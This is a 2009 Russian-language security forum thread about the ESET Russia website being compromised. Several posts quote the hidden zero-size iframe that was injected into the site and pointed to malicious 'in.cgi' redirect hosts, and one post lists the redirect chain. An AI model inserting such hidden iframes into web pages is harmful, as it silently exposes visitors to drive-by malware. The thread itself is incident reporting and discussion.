English version Услуги ·  Реклама ·  Наша команда ·  Наши эксперты ·  Наши принципы ·  О нас  
Форумы по информационной безопасности на Anti-malware.ru
Независимый российский информационно-аналитический портал по информационной безопасности
 

Здравствуйте, гость ( Вход | Регистрация )

RSS 2.0  RSS 2.0

3 страниц V   1 2 3 >  
Reply to this topicStart new topic
> Сайт Eset Russia заражен?, Вредоносный код на сайте esetnod32.ru
Рейтинг 5 V
Umnik
сообщение 20.11.2009, 11:51
Сообщение #1


Guru
******

Статус: Супермодератор
Вставить ник
Сообщений: 3,644
Регистрация: 16.06.2007
Из: Обильное, Георгиевск, Мин-Воды, Пятигорск
Пользователь №: 3,736

За помощь в развитии ресурса (I степени) За активное участие на форуме (II степени)



Репутация:   123  


На http://esetnod32.ru/ висит скрытый фрейм:
Код
</body><iframe pcvsn='j6Av392D' src='хttp://newiframe.com/s/in.cgi?6' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe>
</html>

Говорят, минимум второй день висит.


--------------------

umnik@jabber.ru
Go to the top of the page
 
Quote Post
ALEX(XX)
сообщение 20.11.2009, 12:21
Сообщение #2


Silver Member
**

Статус: Участник
Вставить ник
Сообщений: 96
Регистрация: 26.12.2007
Из: Украина, Чернигов
Пользователь №: 3,976





Репутация:   8  


http://esetnod32.ru/esetforum/viewtopic.ph...330754c8#p12506
Go to the top of the page
 
Quote Post
Alex_Goodwin
сообщение 20.11.2009, 13:09
Сообщение #3


Platinum Member
****

Статус: Участник
Вставить ник
Сообщений: 369
Регистрация: 27.10.2006
Из: Санкт-Петербург
Пользователь №: 1,474

За активное участие на форуме (III степени) За тестирование антивирусов на лечение активного заражения III За подготовку обзоров продуктов



Репутация:   7  


http://www.virustotal.com/ru/analisis/4477...5fac-1258711260
Код
newiframe.com/s/in.cgi?6
script-search-www.com/index.php
script-meta09.com/index/index.php
Go to the top of the page
 
Quote Post
EzzO
сообщение 20.11.2009, 14:00
Сообщение #4


Member
*

Статус: Участник
Вставить ник
Сообщений: 36
Регистрация: 30.11.2008
Пользователь №: 5,069





Репутация:   6  


ой ой ой, сайт антивирусной компании заражен, как-то правильно. Куда смотрят смотрящие?


--------------------
IMHO owner & user
---------------------------------------------------------------------------------------------
Сравните продукты Dr.Web / Free Dr.Web unlocker from "Trojan.Winlock"
Go to the top of the page
 
Quote Post
Skorpion
сообщение 20.11.2009, 14:53
Сообщение #5


Platinum Member
****

Статус: Участник
Вставить ник
Сообщений: 366
Регистрация: 16.04.2009
Пользователь №: 5,672





Репутация:   9  


iFrame я больше не вижу на странице.


--------------------


Go to the top of the page
 
Quote Post
Cooller
сообщение 20.11.2009, 18:25
Сообщение #6


Silver Member
**

Статус: Участник
Вставить ник
Сообщений: 97
Регистрация: 17.05.2009
Пользователь №: 5,854





Репутация:   2  


Уже значит убрали.
Сейчас они типа расследование будут проводить.


--------------------
Go to the top of the page
 
Quote Post
Lias
сообщение 20.11.2009, 18:30
Сообщение #7


Gold Member
***

Статус: Участник
Вставить ник
Сообщений: 143
Регистрация: 07.12.2007
Пользователь №: 3,939





Репутация:   0  


ага
Цитата
По данному инциденту в настоящее время проводится проверка.


вот интересно - а взламывали ли сайты других вендоров??
Go to the top of the page
 
Quote Post
Cooller
сообщение 20.11.2009, 18:42
Сообщение #8


Silver Member
**

Статус: Участник
Вставить ник
Сообщений: 97
Регистрация: 17.05.2009
Пользователь №: 5,854





Репутация:   2  


Цитата(Lias @ 20.11.2009, 18:30) *
вот интересно - а взламывали ли сайты других вендоров??

Конечно, вот например сайт антивируса Панды и не один раз.


--------------------
Go to the top of the page
 
Quote Post
Lias
сообщение 20.11.2009, 19:07
Сообщение #9


Gold Member
***

Статус: Участник
Вставить ник
Сообщений: 143
Регистрация: 07.12.2007
Пользователь №: 3,939





Репутация:   0  


Цитата
Конечно, вот например сайт антивируса Панды и не один раз.
и там тоже подсаживали трояна?
Go to the top of the page
 
Quote Post
Евгений Павлович
сообщение 20.11.2009, 22:19
Сообщение #10


Platinum Member
****

Статус: Участник
Вставить ник
Сообщений: 260
Регистрация: 01.04.2009
Из: Пермь
Пользователь №: 5,588

За помощь в развитии ресурса (III степени)



Репутация:   36  


Жесть ваще....Заговор внутри компании? ))


--------------------


Вступай в группу пользователей ESET - жми СЮДА

Приглашаю в фан-клуб пользователей продуктами компании ESET - вход ЗДЕСЬ
Go to the top of the page
 
Quote Post
kvit.v
сообщение 20.11.2009, 22:25
Сообщение #11


Gold Member
***

Статус: Участник
Вставить ник
Сообщений: 221
Регистрация: 24.08.2009
Пользователь №: 6,418





Репутация:   9  


Цитата(Lias @ 20.11.2009, 19:30) *
вот интересно - а взламывали ли сайты других вендоров??

http://www.xakep.ru/post/44539/default.asp
http://www.lenta.ru/news/2009/02/09/kaspersky/
Go to the top of the page
 
Quote Post
priv8v
сообщение 20.11.2009, 22:36
Сообщение #12


V.I.P.
*****

Статус: Участник
Вставить ник
Сообщений: 686
Регистрация: 29.03.2009
Из: Россия
Пользователь №: 5,570

За активное участие на форуме (III степени) За высокое качество ответо



Репутация:   100  


Цитата(Евгений Павлович @ 20.11.2009, 22:19) *
Жесть ваще....Заговор внутри компании? ))

м.б типичное разгильдяйство?..


--------------------
Кто постигает новое, лелея старое, тот может быть учителем.
Go to the top of the page
 
Quote Post
Евгений Павлович
сообщение 20.11.2009, 23:46
Сообщение #13


Platinum Member
****

Статус: Участник
Вставить ник
Сообщений: 260
Регистрация: 01.04.2009
Из: Пермь
Пользователь №: 5,588

За помощь в развитии ресурса (III степени)



Репутация:   36  


Цитата(priv8v @ 20.11.2009, 22:36) *
м.б типичное разгильдяйство?..


Это, скорее всего, уже как следствие! )


--------------------


Вступай в группу пользователей ESET - жми СЮДА

Приглашаю в фан-клуб пользователей продуктами компании ESET - вход ЗДЕСЬ
Go to the top of the page
 
Quote Post
vaber
сообщение 21.11.2009, 1:38
Сообщение #14


Guru
******

Статус: Эксперт
Вставить ник
Сообщений: 1,315
Регистрация: 26.03.2006
Из: Минск
Пользователь №: 173

Орден за проведение тестирования Медаль за активное участие - II Медаль за вклад в развитие сайта - II За незаменимое участие в проведении тестов



Репутация:   57  


Снова сайт инфицирован...
Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.
Код
<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>


--------------------
Go to the top of the page
 
Quote Post
A.
сообщение 21.11.2009, 2:02
Сообщение #15


Guru
******

Статус: Участник
Вставить ник
Сообщений: 1,344
Регистрация: 19.06.2006
Пользователь №: 413

Орден за проведение тестирования Медаль за активное участие - III



Репутация:   41  


Цитата(vaber @ 21.11.2009, 1:38) *
Снова сайт инфицирован...
Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.
Код
<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>


Ну должен же их "давно и в муках искавшийся" российский вирусный аналитик, широко известный в узких кругах "летун отовсюду", г-н Матросов, с чего-то начинать на новом месте ? smile.gif


--------------------
www.secureblog.ru - кривые взгляды на ИБ.
Go to the top of the page
 
Quote Post
Skorpion
сообщение 21.11.2009, 8:46
Сообщение #16


Platinum Member
****

Статус: Участник
Вставить ник
Сообщений: 366
Регистрация: 16.04.2009
Пользователь №: 5,672





Репутация:   9  


Цитата(vaber @ 21.11.2009, 4:38) *
Снова сайт инфицирован...
Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.
Код
<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Антивирусы реагируют?


--------------------


Go to the top of the page
 
Quote Post
Евгений Павлович
сообщение 21.11.2009, 10:36
Сообщение #17


Platinum Member
****

Статус: Участник
Вставить ник
Сообщений: 260
Регистрация: 01.04.2009
Из: Пермь
Пользователь №: 5,588

За помощь в развитии ресурса (III степени)



Репутация:   36  


У меня при переходе по ссылке ТЕХНИЧЕСКИЙ ФОРУМ переходит на viruslab.ru - Антивирус Панды...Может они и взломали?! ))))
Ваще жесть....дааааааа


--------------------


Вступай в группу пользователей ESET - жми СЮДА

Приглашаю в фан-клуб пользователей продуктами компании ESET - вход ЗДЕСЬ
Go to the top of the page
 
Quote Post
Zilla
сообщение 21.11.2009, 11:21
Сообщение #18


Guru
******

Статус: Участник
Вставить ник
Сообщений: 1,301
Регистрация: 25.04.2009
Пользователь №: 5,743

За активное участие на форуме (II степени)



Репутация:   76  


Форум anti-malware.ru атакован спамерами?


--------------------
Go to the top of the page
 
Quote Post
Евгений Павлович
сообщение 21.11.2009, 11:25
Сообщение #19


Platinum Member
****

Статус: Участник
Вставить ник
Сообщений: 260
Регистрация: 01.04.2009
Из: Пермь
Пользователь №: 5,588

За помощь в развитии ресурса (III степени)



Репутация:   36  


Цитата(Zilla @ 21.11.2009, 11:21) *
Форум anti-malware.ru атакован спамерами?


Это почему?


--------------------


Вступай в группу пользователей ESET - жми СЮДА

Приглашаю в фан-клуб пользователей продуктами компании ESET - вход ЗДЕСЬ
Go to the top of the page
 
Quote Post
Zilla
сообщение 21.11.2009, 11:27
Сообщение #20


Guru
******

Статус: Участник
Вставить ник
Сообщений: 1,301
Регистрация: 25.04.2009
Пользователь №: 5,743

За активное участие на форуме (II степени)



Репутация:   76  


Ну по моим личным наблюдениям сложилось такое мнение smile.gif


--------------------
Go to the top of the page
 
Quote Post

3 страниц V   1 2 3 >
Reply to this topicStart new topic
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



RSS Текстовая версия Сейчас: 03.09.2010, 19:33
Design by: Free Skins IPB & eBusiness Chat